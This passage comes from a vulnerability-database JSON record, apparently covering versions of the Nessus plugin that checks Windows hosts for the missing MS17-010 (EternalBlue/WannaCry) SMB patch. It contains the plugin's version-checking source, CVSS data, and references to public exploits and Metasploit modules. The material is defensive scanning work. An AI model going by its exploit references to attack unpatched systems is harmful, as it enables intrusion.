share);\n\nif (\n ##############\n ## MAY 2017 ##\n ##############\n\n # Windows XP SP2\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"srv.sys\", version:\"5.2.3790.6021\", min_version:\"5.2.3790.3000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\", arch:\"x64\") ||\n # Windows XP SP3\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"srv.sys\", version:\"5.1.2600.7208\", min_version:\"5.1.2600.5000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\", arch:\"x86\") ||\n # Windows Server 2003 SP2\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"srv.sys\", version:\"5.2.3790.6021\", min_version:\"5.2.3790.3000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\") ||\n # Windows 8\n (\n (\"Windows 8\" >< productname && \"Windows 8.1\" >!< productname && \"2012\" >!< productname)\n &&\n hotfix_is_vulnerable(os:\"6.2\", sp:0, file:\"srv.sys\", version:\"6.2.9200.22099\", min_version:\"6.2.9200.16000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\")\n )\n ||\n \n # Windows Server 2012\n (\n \"Windows 8\" >!< productname\n &&\n hotfix_is_vulnerable(os:\"6.2\", sp:0, file:\"srv.sys\", version:\"6.2.9200.22099\", min_version:\"6.2.9200.16000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4019213\")\n ) ||\n\n # Windows 8.1 / Windows Server 2012 R2\n hotfix_is_vulnerable(os:\"6.3\", sp:0, file:\"srv.sys\", version:\"6.2.9200.22137\", min_version:\"6.2.9200.16000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4019213\") ||\n\n ##############\n ## MAR 2017 ##\n ##############\n\n # Windows Vista Service Pack 2 / Windows Server 2008\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"srv.sys\", version:\"6.0.6002.19743\", min_version:\"6.0.6002.18000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\") ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"srv.sys\", version:\"6.0.6002.24067\", min_version:\"6.0.6002.20000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\") ||\n\n # Windows 7 / Windows Server 2008 R2\n smb_check_rollup(os:\"6.1\", sp:1, rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4012212, 4012215)) ||\n\n # Windows Server 2012\n (\n \"Windows 8\" >!< productname\n &&\n smb_check_rollup(os:\"6.2\", sp:0, rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4012214, 4012217))\n ) ||\n\n # Windows 8.1 / Windows Server 2012 R2\n smb_check_rollup(os:\"6.3\", sp:0, rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4012213, 4012216)) ||\n\n # Windows 10\n smb_check_rollup(os:\"10\", sp:0, os_build:\"10240\", rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4012606)) ||\n\n # Windows 10 1511\n smb_check_rollup(os:\"10\", sp:0, os_build:\"10586\", rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4013198)) ||\n\n # Windows 10 1607 / Windows Server 2016\n smb_check_rollup(os:\"10\", sp:0, os_build:\"14393\", rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4013429))\n)\n{\n set_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "naslFamily": "Windows : Microsoft Bulletins", "cpe": ["cpe:/o:microsoft:windows"], "solution": "", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": null, "vulnerabilityPublicationDate": null, "exploitableWith": []}, "lastseen": "2020-06-01T04:18:42", "differentElements": ["cvss2", "cvss3", "modified"], "edition": 4}, {"bulletin": {"id": "SMB_NT_MS17-010.NASL", "hash": "7a18d253a708b29131db1c7e6adf1a49cc2a121960f07ebb5346d89ff0905f53", "type": "nessus", "bulletinFamily": "scanner", "title": "MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya)", "description": "The remote Windows host is missing a security update. It is,\ntherefore, affected by the following vulnerabilities :\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit these\n vulnerabilities, via a specially crafted packet, to\n execute arbitrary code. (CVE-2017-0143, CVE-2017-0144,\n CVE-2017-0145, CVE-2017-0146, CVE-2017-0148)\n\n - An information disclosure vulnerability exists in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted packet, to disclose sensitive\n information. (CVE-2017-0147)\n\nETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE, and ETERNALSYNERGY are\nfour of multiple Equation Group vulnerabilities and exploits disclosed\non 2017/04/14 by a group known as the Shadow Brokers. WannaCry /\nWannaCrypt is a ransomware program utilizing the ETERNALBLUE exploit,\nand EternalRocks is a worm that utilizes seven Equation Group\nvulnerabilities. Petya is a ransomware program that first utilizes\nCVE-2017-0199, a vulnerability in Microsoft Office, and then spreads\nvia ETERNALBLUE.", "published": "2017-03-15T00:00:00", "modified": "2021-07-02T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://www.tenable.com/plugins/nessus/97737", "reporter": "This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010", "http://www.nessus.org/u?321523eb", "http://www.nessus.org/u?d9f569cf", "https://github.com/stamparm/EternalRocks/", "http://www.nessus.org/u?59db5b5b", "http://www.nessus.org/u?065561d0"], "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0199", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-07-29T03:47:18", "history": [], "viewCount": 2951, "enchantments": {"dependencies": {"modified": "2021-07-29T03:47:18", "references": [{"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"], "type": "qualysblog"}, {"idList": ["KLA10977"], "type": "kaspersky"}, {"idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], "type": "malwarebytes"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["SSV:92952", "SSV:92935", "SSV:92964"], "type": "seebug"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"], "type": "saint"}, {"idList": ["SMNTC-96705", "SMNTC-96709", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96703"], "type": "symantec"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"], "type": "trendmicroblog"}, {"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:F48CAEEE-E809-405D-B7AD-48D94140C67D"], "type": "attackerkb"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["MYHACK58:62201786371", "MYHACK58:62201785243", "MYHACK58:62201785189", "MYHACK58:62201785331", "MYHACK58:62201785268", "MYHACK58:62201786816", "MYHACK58:62201786827"], "type": "myhack58"}, {"idList": ["THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["AVLEONOV:C8B855FEC3E31BC28C624FF0B19272B7"], "type": "avleonov"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["FIREEYE:ABF21A18BEF0ABDDD461684446C0A772", "FIREEYE:37C92D78C4F9986624FA2FB49CBCB764", "FIREEYE:8CFA7797EC0BA31DD1AD30C4C7EE1BED", "FIREEYE:E77EEC61CF4FE2F4BDB43A5A0C15A644"], "type": "fireeye"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0199", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "type": "cve"}, {"idList": ["MS17-010.NASL"], "type": "nessus"}, {"idList": ["MS:CVE-2017-0145", "MS:CVE-2017-0143"], "type": "mscve"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/"], "type": "metasploit"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2021-07-29T03:47:18", "rev": 2, "value": 7.6, "vector": "NONE"}}, "objectVersion": "1.6", "pluginID": "97737", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(97737);\n script_version(\"1.24\");\n script_cvs_date(\"Date: 2019/11/13\");\n\n script_cve_id(\n \"CVE-2017-0143\",\n \"CVE-2017-0144\",\n \"CVE-2017-0145\",\n \"CVE-2017-0146\",\n \"CVE-2017-0147\",\n \"CVE-2017-0148\"\n );\n script_bugtraq_id(\n 96703,\n 96704,\n 96705,\n 96706,\n 96707,\n 96709\n );\n script_xref(name:\"MSFT\", value:\"MS17-010\");\n script_xref(name:\"MSKB\", value:\"4012212\");\n script_xref(name:\"MSKB\", value:\"4012213\");\n script_xref(name:\"MSKB\", value:\"4012214\");\n script_xref(name:\"MSKB\", value:\"4012215\");\n script_xref(name:\"MSKB\", value:\"4012216\");\n script_xref(name:\"MSKB\", value:\"4012217\");\n script_xref(name:\"MSKB\", value:\"4012606\");\n script_xref(name:\"MSKB\", value:\"4013198\");\n script_xref(name:\"MSKB\", value:\"4013429\");\n script_xref(name:\"MSKB\", value:\"4012598\");\n script_xref(name:\"IAVA\", value:\"2017-A-0065\");\n script_xref(name:\"EDB-ID\", value:\"41891\");\n script_xref(name:\"EDB-ID\", value:\"41987\");\n\n script_name(english:\"MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya)\");\n script_summary(english:\"Checks the version of the SYS files.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing a security update. It is,\ntherefore, affected by the following vulnerabilities :\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit these\n vulnerabilities, via a specially crafted packet, to\n execute arbitrary code. (CVE-2017-0143, CVE-2017-0144,\n CVE-2017-0145, CVE-2017-0146, CVE-2017-0148)\n\n - An information disclosure vulnerability exists in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted packet, to disclose sensitive\n information. (CVE-2017-0147)\n\nETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE, and ETERNALSYNERGY are\nfour of multiple Equation Group vulnerabilities and exploits disclosed\non 2017/04/14 by a group known as the Shadow Brokers. WannaCry /\nWannaCrypt is a ransomware program utilizing the ETERNALBLUE exploit,\nand EternalRocks is a worm that utilizes seven Equation Group\nvulnerabilities. Petya is a ransomware program that first utilizes\nCVE-2017-0199, a vulnerability in Microsoft Office, and then spreads\nvia ETERNALBLUE.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010\");\n # https://blogs.technet.microsoft.com/msrc/2017/04/14/protecting-customers-and-evaluating-risk/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?321523eb\");\n # https://cloudblogs.microsoft.com/microsoftsecure/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/?source=mmpc\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?065561d0\");\n # https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d9f569cf\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/stamparm/EternalRocks/\");\n # https://www.tenable.com/blog/petyanotpetya-ransomware-detection-for-the-modern-enterprise\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?59db5b5b\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Windows Vista, 2008, 7,\n2008 R2, 2012, 8.1, RT 8.1, 2012 R2, 10, and 2016. Microsoft has also\nreleased emergency patches for Windows operating systems that are no\nlonger supported, including Windows XP, 2003, and 8.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-0148\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/03/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\", \"smb_check_rollup.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS17-010';\nkbs = make_list(\n \"4012212\",\n \"4012213\",\n \"4012214\",\n \"4012215\",\n \"4012216\",\n \"4012217\",\n \"4012606\",\n \"4013198\",\n \"4013429\",\n \"4012598\"\n);\n\nvuln = 0;\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(xp:'3', win2003:'2',vista:'2', win7:'1', win8:'0', win81:'0', win10:'0') <= 0)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nif (hotfix_check_server_nano() == 1) audit(AUDIT_OS_NOT, \"a currently supported OS (Windows Nano Server)\");\n\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows Embedded\" >< productname)\n exit(0, \"Nessus does not support bulletin / patch checks for Windows Embedded.\");\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share))\n audit(AUDIT_SHARE_FAIL, share);\n\nif (\n ##############\n ## MAY 2017 ##\n ##############\n\n # Windows XP SP2\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"srv.sys\", version:\"5.2.3790.6021\", min_version:\"5.2.3790.3000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\", arch:\"x64\") ||\n # Windows XP SP3\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"srv.sys\", version:\"5.1.2600.7208\", min_version:\"5.1.2600.5000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\", arch:\"x86\") ||\n # Windows Server 2003 SP2\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"srv.sys\", version:\"5.2.3790.6021\", min_version:\"5.2.3790.3000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\") ||\n # Windows 8\n (\n (\"Windows 8\" >< productname && \"Windows 8.1\" >!< productname && \"2012\" >!< productname)\n &&\n hotfix_is_vulnerable(os:\"6.2\", sp:0, file:\"srv.sys\", version:\"6.2.9200.22099\", min_version:\"6.2.9200.16000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\")\n )\n ||\n \n # Windows Server 2012\n (\n \"Windows 8\" >!< productname\n &&\n hotfix_is_vulnerable(os:\"6.2\", sp:0, file:\"srv.sys\", version:\"6.2.9200.22099\", min_version:\"6.2.9200.16000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4019213\")\n ) ||\n\n # Windows 8.1 / Windows Server 2012 R2\n hotfix_is_vulnerable(os:\"6.3\", sp:0, file:\"srv.sys\", version:\"6.2.9200.22137\", min_version:\"6.2.9200.16000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4019213\") ||\n\n ##############\n ## MAR 2017 ##\n ##############\n\n # Windows Vista Service Pack 2 / Windows Server 2008\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"srv.sys\", version:\"6.0.6002.19743\", min_version:\"6.0.6002.18000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\") ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"srv.sys\", version:\"6.0.6002.24067\", min_version:\"6.0.6002.20000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\") ||\n\n # Windows 7 / Windows Server 2008 R2\n smb_check_rollup(os:\"6.1\", sp:1, rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4012212, 4012215)) ||\n\n # Windows Server 2012\n (\n \"Windows 8\" >!< productname\n &&\n smb_check_rollup(os:\"6.2\", sp:0, rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4012214, 4012217))\n ) ||\n\n # Windows 8.1 / Windows Server 2012 R2\n smb_check_rollup(os:\"6.3\", sp:0, rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4012213, 4012216)) ||\n\n # Windows 10\n smb_check_rollup(os:\"10\", sp:0, os_build:\"10240\", rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4012606)) ||\n\n # Windows 10 1511\n smb_check_rollup(os:\"10\", sp:0, os_build:\"10586\", rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4013198)) ||\n\n # Windows 10 1607 / Windows Server 2016\n smb_check_rollup(os:\"10\", sp:0, os_build:\"14393\", rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4013429))\n)\n{\n set_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "naslFamily": "Windows : Microsoft Bulletins", "cpe": ["cpe:/o:microsoft:windows"], "solution": "", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": null, "vulnerabilityPublicationDate": null, "exploitableWith": []}, "lastseen": "2021-07-29T03:47:18", "differentElements": ["modified"], "edition": 5}, {"bulletin": {"id": "SMB_NT_MS17-010.NASL", "hash": "9007212104ab51ff65ae1aa2c5a04493", "type": "nessus", "bulletinFamily": "scanner", "title": "MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya)", "description": "The remote Windows host is missing a security update. It is,\ntherefore, affected by the following vulnerabilities :\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit these\n vulnerabilities, via a specially crafted packet, to\n execute arbitrary code. (CVE-2017-0143, CVE-2017-0144,\n CVE-2017-0145, CVE-2017-0146, CVE-2017-0148)\n\n - An information disclosure vulnerability exists in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted packet, to disclose sensitive\n information. (CVE-2017-0147)\n\nETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE, and ETERNALSYNERGY are\nfour of multiple Equation Group vulnerabilities and exploits disclosed\non 2017/04/14 by a group known as the Shadow Brokers. WannaCry /\nWannaCrypt is a ransomware program utilizing the ETERNALBLUE exploit,\nand EternalRocks is a worm that utilizes seven Equation Group\nvulnerabilities. Petya is a ransomware program that first utilizes\nCVE-2017-0199, a vulnerability in Microsoft Office, and then spreads\nvia ETERNALBLUE.", "published": "2017-03-15T00:00:00", "modified": "2021-08-02T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://www.tenable.com/plugins/nessus/97737", "reporter": "This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010", "http://www.nessus.org/u?321523eb", "http://www.nessus.org/u?d9f569cf", "https://github.com/stamparm/EternalRocks/", "http://www.nessus.org/u?59db5b5b", "http://www.nessus.org/u?065561d0"], "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0199", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-08-01T12:07:30", "history": [], "viewCount": 2956, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:F48CAEEE-E809-405D-B7AD-48D94140C67D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "nessus", "idList": ["MS17-010.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:154690"]}, {"type": "zdt", "idList": ["1337DAY-ID-27786", "1337DAY-ID-33313", "1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891", "EDB-ID:43970"]}, {"type": "seebug", "idList": ["SSV:92935", "SSV:92964", "SSV:92952"]}, {"type": "rapid7community", "idList": 